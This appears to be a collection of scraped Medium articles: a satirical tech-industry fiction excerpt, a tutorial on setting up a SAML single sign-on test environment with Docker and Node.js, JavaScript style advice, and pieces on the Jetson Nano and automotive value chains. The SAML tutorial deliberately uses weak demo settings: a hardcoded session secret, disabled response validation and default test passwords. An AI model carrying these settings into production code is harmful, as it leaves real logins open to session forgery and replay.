She spotted him and smiled. “Oh, hi! How are you liking Anahata?”
Arsyen shook his head vigorously. He did not have an answer prepared for this.
But Jennie seemed to have no difficulty continuing the conversation by herself, telling Arsyen something about her feminist book club. Little of what she said registered with him. He was watching her lips move, fascinated by the way they came together and then parted as she spoke just to him. They were so different from Natia’s lips, which moved together in fits and jerks, all depending on the bandwidth of her internet connection.
Sven cleared his throat.
“Jane here was just about to tell us what she’s doing here.”
“It’s Jennie,” she said, turning to Sven. “And I’m here because I’m the new nontechnical technical lead.”
“Huh?”
“I’m your new manager,” Jennie said.
It was as if Vesuvius had exploded across the well-manicured lawns of Palo Alto. Sven’s nose twisted until the rest of his face followed in a spiral of despair. Jonas’ mouth froze in a perfect, horrified O.
Arsyen understood their reaction immediately: They were as upset as he was about having a female boss.
“This sounds like the kind of subterfuge the sales team would instigate, sending a nonengineer in here to sabotage our project,” Jonas said.
Sven jotted some lines on a piece of paper and threw it in front of Jennie. “What do you see here?”
Jennie took the paper in her hands, and Arsyen noticed that her wrists bore the remnants of a henna tattoo. She took a few seconds to study the crude drawing, which showed a graph with a diagonal line descending from the top left-hand side to the bottom right.
“Um, a descending line?” she said.
“And what’s the first thing you think of, in the context of Anahata?” Sven asked.
“I don’t know…falling profits?”
“I knew it — imposter!” he yelled, leaping to his feet.
“But I’m not from the sales team. And that was just a line — ”
“You could’ve said it was a Pareto curve, or a drop in latency, or a decrease in the number of users,” Sven said. “There were endless acceptable possibilities.”
“The possibilities were indeed infinite, in a figurative if not exact sense,” Jonas nodded.
“You had so many options, and yet what’s the first thing that comes to mind? Money. You are from sales. Out with you!” Sven’s finger pointed toward the hall, its edict winding across the floor and out the exit door, sending Jennie back to the reception area from whence she came.
Jennie glanced at Arsyen. Help! her eyes seemed to plead. It was clear she didn’t belong there — maybe she had also been trying for a janitorial position, like Arsyen, and had been mistakenly rerouted to Social Car.
“Did you come to clean?” whispered Arsyen, stepping closer. He reached into his pocket to grab the air freshener.
Jennie shot him a dirty look. “You think because I’m a woman I’m supposed to clean your cubicle?”
Jennie opened her leather fringe vest and shoved her chest at Arsyen. Feminism Happens Here, the T-shirt read.
Arsyen froze. He was not used to such forwardness in American women.
Jennie turned back to Sven and Jonas.
“Gregor Guntlag himself asked me to do this. He said I didn’t need to know how to code — just to lead. I’m a tour guide. I know how to lead people.”
Sven | https://medium.com/s/the-big-disruption/the-big-disruption-36fbed0268cf | ['Jessica Powell'] | 2019-06-19 14:03:52.831000+00:00 | ['Technology', 'Marketing', 'Fiction', 'Feminism', 'Equality'] |
193 | Setup a Single Sign On SAML Test Environment with Docker and NodeJS | I’m Jeffry Houser, a developer from the Polaris team in the content engineering group at Disney Streaming Services. Polaris was named after Magneto’s daughter from the X-men, and we build internal tools that allow editors to create magic for our customers in the video services we power.
When working on one of our tools, we needed to integrate with a single sign on system that uses SAML for authentication. Setting up a local environment for testing SAML was not a trivial task. A lot of articles we found recommended using Feide OpenIdP as a test provider, however that shut down years ago. Additionally, many of the code samples used outdated libraries, leaving some gaps in our knowledge. It took some trial and error to piece together a working solution and I’m going to teach you how we did it.
Defining Terms
The first time I was exposed to it, SAML was difficult for me to get my head around. As such, I’m going to start out with some definitions that will help you understand the pieces of a SAML application.
Single Sign On (SSO): Any system that allows authentication code and login data to be shared across multiple applications.
Security Assertion Markup Language (SAML): A framework, and XML schema, for implementing Single Sign On.
Principal: The user who is attempting to gain access to our application.
Assertions: Data about the principal which are included as part of the SAML response. Samples of this might be the user’s name, or other permission data.
Service Provider (SP): This is the application, or system, that the user is attempting to access. We will build a simple SP as part of this article.
Identity Provider (IdP): This is a remote application, or system, that authenticates the user and returns data back to the service provider. We’re not going to build an IdP from scratch, but I’ll show you how to set up and use a pre-built one.
Globally Unique Identifier: A value that the IdP will use to identify an SP.
Knowing the definitions is a great start but knowing how these pieces work together is even more important and I’ll go over that next.
Review the Application Flow
This is a common flow for a SAML application:
Let’s follow the flow:
1. The Principal (AKA the user) tries to access your Service Provider (AKA your application).
2. The Service Provider checks to see if it knows the Principal. In a browser-based app, this session information would probably be stored as a cookie, but a desktop or application server may store that information in memory. If the user is known, we can load the app normally, so move on to step 8. If the user is not known, jump to step 3 to start the authentication process.
3. If no user is known, the SP creates a SAML Request and sends that request to the IdP. This request will contain the Globally Unique Identifier so that the IdP knows which application the principal requested access to.
4. Now the IdP handles the request. It will authenticate the user. It may do this based on an existing session from a previous sign-in, or it may have the user log in anew.
5. Did the IdP successfully collect user details on the Principal? If so, go to step 7, the success step. Otherwise go to step 6, the failure step.
6. If the Principal was not able to log in, the IdP will handle authentication errors and the SP will know nothing about the failure.
7. If the IdP successfully logged the user in, it will create a SAML response packet, including assertions about the user, and send the info back to the SP’s callback URL. The SP will use that data to create a user session.
8. If the Principal authenticated properly, load up the app and let them in.
The rest of this article will focus on steps 3 through 7.
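To make step 3 a bit more concrete, here is a hypothetical, heavily simplified sketch of the kind of XML an SP sends. The issuer value and callback URL match the ones we configure later in this article, but the function itself is purely illustrative; a real AuthnRequest also carries an ID, an IssueInstant, and usually a signature, and a library like passport-saml deflates and base64-encodes it for us.

```javascript
// Illustrative sketch only: a real SAML library builds, signs, and encodes this.
function buildAuthnRequest(issuer, callbackUrl) {
  return [
    '<samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"',
    `  AssertionConsumerServiceURL="${callbackUrl}">`,
    `  <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">${issuer}</saml:Issuer>`,
    '</samlp:AuthnRequest>',
  ].join('\n');
}

const request = buildAuthnRequest('saml-poc', 'http://localhost:4300/login/callback');
console.log(request.includes('saml-poc')); // true
```

The key point is simply that the request names the SP via its Globally Unique Identifier, so the IdP knows which application is asking.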
Install Prerequisites
You’ll want to install a few prerequisites before we start jumping into the code:
Docker: Docker is a container platform that lets us easily create virtual machines with predefined code. We’re going to use it to easily create our own Identity Provider.
NodeJS: We are going to write our Service Provider from scratch using a NodeJS and some common plugins.
OpenSSL: OpenSSL can be used to create public and private key certificates. Certs like these are often used for SSL on web sites, but we’re going to use them to encrypt and decrypt the packets we’re sharing between our SP and IdP.
The install instructions at the respective sites will give better setup instructions than anything I could provide here.
Setup our Identity Provider
Creating an identity provider is hard and complicated, so we’re going to use an easily configurable application, SimpleSAMLphp, and run it in an existing docker container.
The image is already published on Docker Hub, so we can download it without needing to build it from source. Run this docker command at your command line:
docker pull kristophjunge/test-saml-idp
You’ll see something like this:
Now you should be able to run the docker image:
docker run --name=testsamlidp -p 8080:8080 -p 8443:8443 \
  -e SIMPLESAMLPHP_SP_ENTITY_ID=saml-poc \
  -e SIMPLESAMLPHP_SP_ASSERTION_CONSUMER_SERVICE=http://localhost:4300/login/callback \
  -d kristophjunge/test-saml-idp
There is a lot going on in this command, and it can be confusing if you are not familiar with Docker. Let’s look at each part of the command:
docker run: This tells Docker to run a new container.
--name=testsamlidp: This tells Docker that the name of our local container will be testsamlidp.
-p 8080:8080 -p 8443:8443: These are port mappings. Docker listens to the external port 8080 and maps it to the internal port 8080, and likewise maps external port 8443 to internal port 8443. The two ports are for http and https traffic into our IdP.
-e SIMPLESAMLPHP_SP_ENTITY_ID=saml-poc: This passes an argument into our docker container. It defines the Globally Unique Identifier for the service provider. We’ll use this value in our SP code later.
-e SIMPLESAMLPHP_SP_ASSERTION_CONSUMER_SERVICE=http://localhost:4300/login/callback: This is another argument we’re passing into the docker container. We’re telling it where to redirect to after a successful login. When we build out the Service Provider, it will be on port 4300 at our localhost.
-d: The d argument tells Docker to run the container in the background and print out the container ID.
kristophjunge/test-saml-idp: This tells Docker which image to use for our container.
Run the command and you’ll see something like this:
You can run this command
docker ps
to make sure that the docker image is running:
Try to load the SAML IdP provider in your browser by going to this URL:
http://localhost:8080/simplesaml
You should see something like this:
Click the Authenticated Tab:
Then click on Test configured authentication sources, which will bring you to the list of configured sources.
Then click the `example-userpass` link. Opening this URL on your localhost should bring you directly there:
There are two users created in this app by default:
UID | Username | Password  | Group  | Email
==================================================================
1   | user1    | user1pass | group1 | [email protected]
2   | user2    | user2pass | group2 | [email protected]
Enter one of these users and click the login button, you should see the user information output to the screen:
Click around and go back to the login screen. You will not be presented with another login screen until you log out — or until your cookie expires. The IdP is keeping track of your session login and this is independent of the SPs session tracking.
If you think about your day and the things that use single sign on, you’ll realize that you don’t sign on all that much. Google is a great example. I probably access a dozen or so apps that integrate with a single sign on provider (Google Calendar, Gmail, and YouTube are some examples), but I will often go for days without signing back in. This caching mechanism on the IdP side allows me to log in once, while still having access to all the other services.
Create a Service Provider
With the IdP all ready to go, it is time to create the service provider to integrate with it.
Setup The Node Libraries
You should already have NodeJS installed if you followed the prerequisite steps earlier in the article. Run:
npm init
In a blank directory to create the project. Enter these values:
Package Name: aop-sp
Version: 1.0.0
Description: Art of Possible Service Provider
Entry Point: index.js
Test command: [leave blank]
Git repository: [leave blank]
Keywords: [leave blank]
Author: Your Name
License: (ISC)
Is this Okay? Yes
You should see something like this:
Now let’s start installing some Node packages. First, install Express:
npm install express
You should see something like this:
Express is a web server for NodeJS, and we’ll use that as part of our system.
Now install express-session, which allows us to create a server side session associated with a cookie:
npm install express-session
You should see something like this:
Next we want to install an express body parser
npm install body-parser
You’ll see this:
The body parser will parse the bodies of incoming requests and let our code access an object instead of trying to deal with raw data as part of the request.
Next, load up the cookie-parser, which copies the cookie header of incoming requests to an object of cookie names:
npm install cookie-parser
You’ll see this:
Next install the Passport Library:
npm install passport
Passport is a very popular authentication framework used on top of Node. You should see this:
Finally, install passport-saml. This is a SAML plugin to the Passport library.
While the Passport library provides a framework for handling authentication, it is extensible to allow for different approaches to be plugged into it. These approaches are called strategies, and the passport-saml library is a SAML strategy for Passport. We use it so that we do not have to manually create packets when requesting a login from the authentication library or process the packets that get returned. This library makes our lives easier by doing that for us.
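The named-strategy idea can be modeled in a few lines of plain JavaScript. This is only a conceptual sketch; the names use and authenticate mirror Passport's API shape, but the real library does far more (request handling, redirects, sessions), and the toy strategy below is entirely made up:

```javascript
// Conceptual model of Passport's strategy registry: register strategies under
// a name, then dispatch authenticate() calls to whichever one was requested.
const strategies = {};

function use(name, strategy) {
  strategies[name] = strategy;
}

function authenticate(name, credentials) {
  return strategies[name].authenticate(credentials);
}

// A toy "strategy" that accepts exactly one user (fabricated for illustration).
use('toyStrategy', {
  authenticate: (creds) => creds.username === 'user1' && creds.password === 'user1pass',
});

console.log(authenticate('toyStrategy', { username: 'user1', password: 'user1pass' })); // true
console.log(authenticate('toyStrategy', { username: 'user2', password: 'nope' }));      // false
```

This is why swapping SAML for, say, OAuth mostly means registering a different strategy rather than rewriting the app.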
If you’ve been following along, you should have a package.json that looks something like this:
{
"name": "aop-sp",
"version": "1.0.0",
"description": "Art of Possible Service Provider",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"author": "Jeffry Houser",
"license": "ISC",
"dependencies": {
"body-parser": "^1.19.0",
"cookie-parser": "^1.4.4",
"express": "^4.16.4",
"express-session": "^1.16.1",
"passport": "^0.4.0",
"passport-saml": "^1.0.0"
}
}
Create an empty index.js file in the same directory as the package.json, we’ll get to populating that shortly.
Create Certs
We are going to need three certificate files for our application. First, we’ll use OpenSSL to create a public and private key pair for our application. We’ll sign our SAML requests with our private key, and the IdP will use our public key to verify them. Likewise, the IdP signs its responses with its private key, and we’ll use its public key to verify those.
First, let’s use OpenSSL to create our own keys. Run this at your console:
openssl req -x509 -newkey rsa:4096 -keyout certs\key.pem -out certs\cert.pem -nodes -days 900
You’ll need to create your certs directory before running that command. This command will step you through a wizard asking you for pertinent information to the key generation. Here are the values I entered:
Country Name : US
: US State or Province : Connecticut
: Connecticut Locality : Central
: Central Organization Name : ArtOfPossible
: ArtOfPossible Organizational Unit : BlogWriter
: BlogWriter Common Name : JeffryHouser
: JeffryHouser EmailAddress: [This space intentionally Left Blank]
You should see something like this with the final results:
You’ll have two files generated from this:
cert.pem : Your Public cert
: Your Public cert key.pem: Your Private cert.
We’ll reference these from our code when creating our service provider. We need one more cert, the IdP’s public cert. To get that, open up the IdP’s metadata page:
http://localhost:8080/simplesaml/saml2/idp/metadata.php
You should see:
Look for the X509Certificate tag in the XML and copy it to a file named idp_key.pem in your certs directory.
Setup Express Web Sever
Let’s set up Express. Open up the empty index.js. Start with some imports:
var express = require("express");
var session = require('express-session');
var bodyParser = require('body-parser');
var cookieParser = require('cookie-parser');
This imports the express web server and three plugins — express-session, body-parser, and cookie-parser.
Now create an instance of Express, and save to the app variable:
var app = express();
Now, we tell the Express instance to use the other plugs. First, the cookieParser:
app.use(cookieParser());
Cookies will be required to tell whether the user is authenticated or not. This will be done behind the scenes by the passport library.
Now set up the bodyParser:
app.use(bodyParser.urlencoded({ extended: false }))
app.use(bodyParser.json())
The body parser can turn the body text of a URL request into a simple object for us to access. The urlencoded() command will handle `application/x-www-form-urlencoded` values. The json() command will take care of any JSON values.
Finally, set up the session:
app.use(session({secret: 'secret',
resave: false,
saveUninitialized: true,}));
The secret value is used to sign a sessionID cookie. The sessionID will reference the server-side session. We can use any value we want for the secret key, but for the purposes of this sample I made it simple. The resave value determines whether to save the session value back into the session store after every request, even if it was not changed. Typically there is no need to do this. The saveUninitialized value is set to true. This means that a session is always saved after it is created, even if it was not modified.
Now let’s create a handler for the root of our application:
app.get('/',
function(req, res) {
res.send('Test Home Page');
}
);
This is a get() request on the express app variable. It looks for the root directory, ‘/’. The way that express works is that each request is a collection of functions. The function accepts the request and response arguments, abbreviated to req and res respectively. In this case, we only run a single function which returns the text ‘Test Home Page’. Later we’ll run functions to validate users.
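The "collection of functions" idea can be modeled in plain JavaScript. This toy dispatcher only illustrates how Express walks a handler chain via next(); it is not Express's actual implementation:

```javascript
// Toy model of Express's handler chain: each handler receives (req, res, next),
// and calling next() advances to the following handler in the list.
function run(handlers, req, res) {
  let i = 0;
  function next() {
    const handler = handlers[i++];
    if (handler) handler(req, res, next);
  }
  next();
}

const calls = [];
const req = {};
const res = {};

run(
  [
    (req, res, next) => {
      calls.push('logger'); // e.g. log the request, then hand off
      next();
    },
    (req, res) => {
      calls.push('responder'); // the final handler "sends" the response
      res.body = 'Test Home Page';
    },
  ],
  req,
  res
);

console.log(calls);    // [ 'logger', 'responder' ]
console.log(res.body); // Test Home Page
```

Our login route later uses exactly this pattern: a logging function, then passport's authenticate handler.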
Finally, add some code to start the server:
var server = app.listen(4300, function () {
console.log('Listening on port %d', server.address().port)
});
This will listen to port 4300, and show something on the console to prove that is listening.
Run the server:
node index
You should see:
Load the root in your browser at http://localhost:4300 :
Pop open the web developer tools to look at your cookies. Go to the Application tab and expand cookies under storage:
You should see the connect.sid cookie which was created by the express server. This is the session identifier that the server uses to track you between browser requests. Your browser is successfully hooked up to a server session, even though no data is stored in it yet.
Configure Simple-SAML
Now we’re ready to setup the Passport and SAML libraries. First load the libraries:
var passport = require('passport');
var saml = require('passport-saml');
var fs = require('fs');
I’ve already mentioned passport and passport-saml, but I also add the fs library, which will let us access the file system. We’ll use that to load our certs from disk into the SAML configuration.
Passport requires that we add functions to serialize and deserialize the user, so that is the first thing we’ll do:
passport.serializeUser(function(user, done) {
console.log('-----------------------------');
console.log('serialize user');
console.log(user);
console.log('-----------------------------');
done(null, user);
});

passport.deserializeUser(function(user, done) {
console.log('-----------------------------');
console.log('deserialize user');
console.log(user);
console.log('-----------------------------');
done(null, user);
});
These functions are default functions that just output the user to the console, which is a great debugging tool.
We need to set up a samlStrategy, so that Passport knows how to create requests and process the login. Start with this:
var samlStrategy = new saml.Strategy({
// config options here
}, function(profile, done) {
return done(null, profile);
});
The saml.Strategy() accepts two arguments. The first is a configuration object, which I left blank for the moment, and the second is a function which processes the user. The first argument into the function is a profile object, and the second is done, a callback. For our purposes, we are just executing the callback and sending it the profile object unchanged. If we needed more functionality, such as loading application-specific permissions from a database, this could be done here.
Now, let’s populate the configuration object with values. I decided to drop these in one by one so I could explain each one:
callbackUrl: 'http://localhost:4300/login/callback',
The callbackUrl is a URL in our application (the service provider) where the IdP will post back after a successful user authentication. This is the same value we passed to the docker container as SIMPLESAMLPHP_SP_ASSERTION_CONSUMER_SERVICE. We haven’t created this route yet, but we will.
entryPoint: 'http://localhost:8080/simplesaml/saml2/idp/SSOService.php',
The entryPoint is the URL in the IdP that we send our request to in order to let the user authenticate. For our docker-based IdP, this is SimpleSAMLphp’s SSOService.php endpoint.
Now the issuer:
issuer: 'saml-poc',
The issuer is a globally unique identifier for our application. When we ran the docker image, we passed this value into it as a configuration option named SIMPLESAMLPHP_SP_ENTITY_ID.
identifierFormat: null,
The identifierFormat is a specific format you can request from the IdP. We’re leaving it null here, but most likely your IdP administrators will provide a value that you must enter.
Now set up the keys:
decryptionPvk: fs.readFileSync(__dirname + '/certs/key.pem', 'utf8'),
privateCert: fs.readFileSync(__dirname + '/certs/key.pem', 'utf8'),
The decryptionPvk and privateCert options both point at the local private key we generated. The privateCert is used to sign the authentication request before we send it to the IdP, and the decryptionPvk is used to decrypt any encrypted assertions in the response. This is where I’m using the fs library to load the key from disk.
validateInResponseTo: false,
The validateInResponseTo value will determine if the incoming SAML responses need to be validated or not. I set it to false for simplicity in our sample.
disableRequestedAuthnContext: true,
The disableRequestedAuthnContext is another Boolean value. This can be helpful when authenticating against an Active Directory Server.
cert: fs.readFileSync(__dirname + '/certs/idp_key.pem', 'utf8')
The cert option holds the IdP’s public certificate, the idp_key.pem file we copied out of the IdP’s metadata earlier. passport-saml uses it to validate the signature on the SAML responses coming back from the IdP.
That completes our samlStrategy configuration object.
After the strategy creation, tell passport to use the samlStrategy:
passport.use('samlStrategy', samlStrategy);
Simple enough, now initialize passport:
app.use(passport.initialize({}));
app.use(passport.session({}));
The session() is middleware that allows for persistent login — AKA keeping track of users.
Create Login Routes
Let’s create the login handler. It is pretty simple:
app.get('/login',
function (req, res, next) {
console.log('-----------------------------');
console.log('/Start login handler');
next();
},
passport.authenticate('samlStrategy'),
);
I’m using a get() handler on the app variable, and the value is ‘/login’. That means when I load `http://localhost:4300/login` it will run the functions, one after another. The first function just logs to the console that the login handler has executed, and then calls next(). The next() function is a reference to the next handler function. For the next handler function, we are just telling the passport library to authenticate using the ‘samlStrategy’. This will redirect to the IdP, which will handle login and post results back to a `login/callback` handler.
Here is the callback handler:
app.post('/login/callback',
function (req, res, next) {
console.log('-----------------------------');
console.log('/Start login callback ');
next();
},
passport.authenticate('samlStrategy'),
function (req, res) {
console.log('-----------------------------');
console.log('login call back dumps');
console.log(req.user);
console.log('-----------------------------');
res.send('Log in Callback Success');
}
);
This calls the post() method on the express instance, app. The URL is the first argument of the method, ‘/login/callback’. First there is a function which just logs the currently running request and calls next() so that the next function can run. The next function is the passport.authenticate() call. This is the same code that we had in login, but here in the callback it sees that we have a return value from the IdP and processes it by calling the serializeUser() function we set up earlier. Then it calls the next function, which outputs the user returned from the service.
Try this. First load up:
http://localhost:4300/login
You won’t see anything, but you’ll automatically be redirected to the IdP login screen:
Look at your web server console:
You’ll see that the login handler was properly hit before the redirect.
Now Enter user1 and user1pass and click Login:
You can see that the “Log in Callback Success” message is loaded in the page’s body. Checking the cookies in the web developer tools, you see three:
PHPSESSIDIDP: This is a session identifier set by the IdP.
SimpleSAMLAuthTokenIdp: This is a user identifier set by the IdP.
connect.sid: This is the session identification token set by our express-session plugin.
Check out the console:
You can see that after the initial login handler ran, the login callback ran. The serializeUser() dumped the user information out to the console, and then the callback URL dumped out the same user info again. This demonstrates that the login succeeds, even if we aren’t doing anything with the user yet. The information you get back in the user object depends primarily on what the IdP is programmed to send you.
Create our own metadata link
You may remember that the IdP had a metadata link. We used that to get the public key we passed into the cert option of our samlStrategy variable. We can create our own metadata route to provide that information to the IdP we are integrating with:
app.get('/metadata',
function(req, res) {
res.type('application/xml');
res.status(200).send(
samlStrategy.generateServiceProviderMetadata(
fs.readFileSync(__dirname + '/certs/cert.pem', 'utf8'),
fs.readFileSync(__dirname + '/certs/cert.pem', 'utf8')
)
);
}
);
This creates a get request for metadata, and we use generateServiceProviderMetadata() to generate this page’s XML. It outputs the public cert in utf8 format. Restart the app and load the metadata route in your browser:
The great thing about this metadata page is that we can use it to share our internal details with the IdP and the IdP can use it to share its internal details with us. Hopefully we can use it to automate part of our systems so when data changes on one side, the other doesn’t have to manually make changes.
Final Thoughts
I know this article makes it sound super easy to set this up, but our team stumbled a bit doing it. My success is because I was able to stand on their shoulders, and I’m happy to share this with you.
For our apps, it is important to secure things up and down the stack, and integrating this SSO approach was a big step forward in making that happen. | https://medium.com/disney-streaming/setup-a-single-sign-on-saml-test-environment-with-docker-and-nodejs-c53fc1a984c9 | ['Jeffry Houser'] | 2019-07-11 14:35:28.685000+00:00 | ['Technology', 'Passportjs', 'Nodejs', 'Docker', 'Saml']
194 | JavaScript Best Practices — Renaming Imports and Proper Variable Declaration | JavaScript is a very forgiving language. It’s easy to write code that runs but has mistakes in it.
In this article, we’ll look at the proper way to rename imports and how to declare JavaScript variables properly.
No Renaming Import, Export, and Destructured Assignments to the Same Name
In JavaScript, we can rename our imported members and members that are exported with the as keyword.
Likewise, we can rename destructured assignments variable to the name that we want with the colon and the name we want after it.
For instance, we can rename an imported member as follows:
import { foo as bar } from "./module";
In the code above, we imported the foo member from module.js and then renamed it to bar in the current module by using the as keyword as we did above.
Then we can reference bar instead of foo in the current module.
We can also do the same thing for exports. For instance, we can write the following to export a member with a different name than it’s defined as.
To do that, we can write the following:
module.js
const foo = 1;
export { foo as bar };
index.js
import { bar } from "./module";
In the code above, we defined the constant foo in module.js and exported it as bar by using the as keyword in our export statement.
This lets us rename our exports before it’s exported.
We can also rename destructured assignments as by writing the following code:
const {
foo: bar
} = {
foo: 1
};
In the code above, we renamed our destructured foo property to bar by writing:
{
foo: bar
}
Then JavaScript will pick up the foo property from the right side and set its value as the value of bar, so that we reference it with bar instead of foo.
This is a convenient way to destructure object properties to variables and also rename them with the variable name that we want.
However, with these syntactic sugars, we can use them in useless ways by renaming them to the same name as they’re originally defined.
For instance, with imports, we can write the following code:
import { foo as foo } from "./module";
With exports, we can write something like:
const foo = 1;
export { foo as foo };
And with destructuring syntax, we can write:
const {
foo: foo
} = {
foo: 1
};
Since we renamed the variable to the same name as before, the renaming code is useless.
Therefore, we should remove them.
For imports, we just write:
import { foo } from "./module";
We can rewrite our export code as follows:
export const foo = 1;
And with destructuring, we can write:
const {
foo
} = {
foo: 1
};
Photo by Kyaw Tun on Unsplash
Use let or const Instead of var to Declare Variables and Constants
In modern versions of JavaScript, there’s a right way to declare variables and constants.
We should eliminate anything that’s declared with var and use let or const instead.
Variables declared with var are function-scoped and hoisted, which leads to lots of confusion among developers.

We don’t want that kind of confusion in our code.
For instance, with var, a variable can be accessed outside the block it was declared in. We can define and access a variable as follows:
const foo = () => {
if (true) {
var x = 1;
}
console.log(x);
} foo();
In the code above, we’ll see that the console log outputs 1 because x is available outside the block since it’s declared with var .
Also, we can reference x before it’s defined because of hoisting, so if we have:
const foo = () => {
console.log(x);
if (true) {
var x = 1;
}
}
Then logging x will log undefined since we logged x ‘s value before it’s defined.
This is confusing to lots of people, and so since ES6, we have the let and const keywords to declare variables and constants respectively.
let and const are block-scoped so that variables and constants declared with them can’t be accessed outside blocks.
For instance, the following will give us an error because we tried to access the variable outside the block:
const foo = () => {
console.log(x);
if (true) {
let x = 1;
}
}
The following will also give us an error:
const foo = () => {
if (true) {
let x = 1;
}
console.log(x);
}
We can only access x inside the if block as follows:
const foo = () => {
if (true) {
let x = 1;
console.log(x);
}
}
With const , we can declare constants, which means that they can’t be reassigned to a new value. It’s also block-scoped like let .
When we declare variables with let and const , there’s no confusion.
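As a quick sketch of the const behavior described above (the variable names are arbitrary), reassigning a constant throws a TypeError at runtime:

```javascript
const limit = 10;

let errorName = null;
try {
  // Reassigning a const binding always throws at runtime.
  limit = 20;
} catch (err) {
  errorName = err.name;
}

console.log(errorName); // "TypeError"
```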
Conclusion
We shouldn’t rename imports, exports, and destructured assignments to the same name as before, since doing so is useless. | https://medium.com/swlh/javascript-best-practices-renaming-imports-and-proper-variable-declaration-aa405c191bee | ['John Au-Yeung'] | 2020-05-27 16:49:59.615000+00:00 | ['JavaScript', 'Software Development', 'Programming', 'Technology', 'Web Development'] |
195 | This $59 A.I. Kit Could Change How You Think About Smart Devices Forever | Photo: NVIDIA Jetson Nano 2GB Developer Kit/NVIDIA
Artificial intelligence has been heralded as the next wave of computing for years, but learning or even tinkering with it has required access to expensive hardware with powerful GPUs capable of crunching massive data sets.
That’s starting to change with the debut of cheap all-in-one A.I. computers from companies like Nvidia, which introduced its latest Jetson Nano A.I. developer kit this week — for just $59. The Jetson is a full computer in a tiny package, similar to a Raspberry Pi, that allows hacking on projects or learning from home, while making A.I. accessible to a much broader audience.
The debut of the Raspberry Pi in 2012 was a watershed moment for computing because it made computers accessible in a tiny, all-in-one package, for just $35. It meant that hobbyists like me could buy a full computer and hack around with ideas, like building a magic mirror or DIY smart screen. Before the Raspberry Pi, there were few ways to tinker on these kinds of ideas without investing hundreds of dollars in specialized hardware or cannibalizing an old laptop for the job.
Cheap, integrated computers like the Jetson and Google’s “Coral” development board are poised to do the same for A.I. Oversimplifying it, A.I. (which is often referred to as machine learning) is basically processing vast quantities of data to “teach” a computer to find a pattern in that data. Doing so relies on GPUs, which are adept at processing large sets of data quickly and running inference.
The problem, until recently, has been that the GPUs required to perform machine learning tasks are expensive, large, and require building an entire computer. That meant that those interested in the field generally had a choice: build a powerful desktop computer, or pay Google, Amazon, or Microsoft for their cloud platforms to do it for you.
While these cloud platforms are useful, the raw processing power required for A.I. meant that it was difficult to build smarts into home devices without depending on an internet connection to send data to that cloud. Ring’s smart doorbells, for example, perform facial recognition in the cloud because there’s historically been no reasonable, affordable way to put the smarts required into a device that’s glued to your door.
Nvidia’s Jetson computer, and others like it, change the game by making tiny, powerful chips that let people access the power of A.I. without needing to rely on the power of the cloud. Instead of building a smart doorbell that relies on a cloud server to perform facial recognition, Jetson makes it simple to run that algorithm locally, without sending data to the cloud for processing. Want to build a self-driving robot that doesn’t crash into objects for under $100? That’s now a reality.
Cheap A.I.-enabled computers level the playing field.
This is an enormous leap because it means it’s now possible to build privacy-first smart devices that don’t rely on the cloud to crunch petabytes of your personal data in order to be useful. It would allow device makers like Roomba, for example, to build vacuum cleaners that learn about your home’s layout without sending that data to the cloud, or companies like Ubiquiti to build smart doorbells that detect faces in footage without sending it outside your home. More importantly, it allows you to do the same without spending thousands of dollars.
The process of crunching this data on-device is referred to as “Edge” A.I., which means that the processing is done near the source of data. While this technology has been used in smartphones in recent years for things like processing “Hey Siri” on the iPhone and Google’s Call Screen technology, it hasn’t been as common in other smart devices because it’s cheaper to just fire that data off to the cloud than to include an expensive custom chip to process information locally. That comes at the cost of your privacy — and a reliance on the company keeping those servers online so your device continues to function.
Dependence on the cloud gives companies like Ring, which is owned by Amazon, an advantage over any new entrants to the space because it has access to practically unlimited resources from its parent company to build A.I.-enabled devices for free. Cheap A.I.-enabled computers level the playing field: Anyone can now play with fully fledged A.I. for a onetime cost of $59 and build devices that compete with the industry’s giants without paying endless cash to the cloud platforms to get access to the smarts they require.
More importantly, devices like Jetson open the floodgates for a new generation to play around with their A.I.-powered ideas at home, building their own voice assistants or self-flying drones without requiring an internet connection or an expensive investment in high-end hardware.
Like the Raspberry Pi leveled the playing field for hobbyists and students a few short years ago, Nvidia’s new Jetson computer will usher in a new wave of A.I.-based projects that anyone can build for themselves simply because it’s so accessible — and some of those ideas might turn into the next big thing. | https://medium.com/@rapnibijce3682/this-59-a-i-kit-could-change-how-you-think-about-smart-devices-forever-e918e45a2480 | ['Rapni Bijce'] | 2020-11-22 22:29:44.062000+00:00 | ['Artificial Intelligence', 'Computing', 'Technology', 'Smart Home', 'Gadgets'] |
196 | How is the automotive value chain ‘stacking up’? | Exponential growth in technology is impacting the Automotive industry.
What do we mean by ‘exponential growth in technology’?
Three exponential laws:
Moore’s law: Every 18 months, your computer will have twice as much power to process information.
Butters’ law: The amount of data communicated through a single optical fiber doubles every nine months.
Kryder’s law: The amount of data stored per square centimeter of a hard drive will double every 16 or 17 months.
Click here to check out some visual references of these laws.
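To make the compounding concrete, here is a small sketch that projects each law’s growth factor over a 10-year horizon (the doubling periods come from the list above; the 10-year horizon is an arbitrary choice for illustration):

```javascript
// Growth factor after `years`, given a doubling period in months.
function growthFactor(doublingMonths, years) {
  return Math.pow(2, (years * 12) / doublingMonths);
}

const years = 10;
console.log(growthFactor(18, years).toFixed(0)); // Moore's law:  "102"
console.log(growthFactor(9, years).toFixed(0));  // Butters' law: "10321"
console.log(growthFactor(17, years).toFixed(0)); // Kryder's law: "133"
```

In other words, a nine-month doubling period compounds to roughly a ten-thousand-fold increase in a decade, which is why this growth is called exponential.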
What does this mean for the automotive industry?
More than 40% of a vehicle’s architecture is now electronics, featuring over 100 million lines of code. This is set to rise to 300 million by 2030. Cars in the 1980s had only 50K lines of code which gives you an indication of how times are changing.
As technology has developed and large incumbent organizations have failed to adapt, new market players have been able to enter and disrupt industries such as automotive with new consumer offerings.
Traditional value chains and vertical integration:
Value chains are the organisation of entities in a market that create and deliver value to consumers.
Typically, automotive competitors have aimed towards vertically integrating their value chains.
Vertical integration is a strategy where a company:
Owns or controls its suppliers, distributors or retail locations to control its value creation and delivery across multiple steps in the supply chain.
In the past, vertical integration has allowed companies to control processes and drive down costs in predictable market situations.
Example: Hyundai is an organisation with a typically vertically integrated or closed value chain, owning or controlling parts of their end-to-end chain.
Simplified example of an automotive value chain:
[Image below] Players in a traditional value chain and digital-first entrants that are making an impact.
‘Stacking’ of the value chain:
Technology is enabling deconstruction of the traditional automotive value chain into a stack structure.
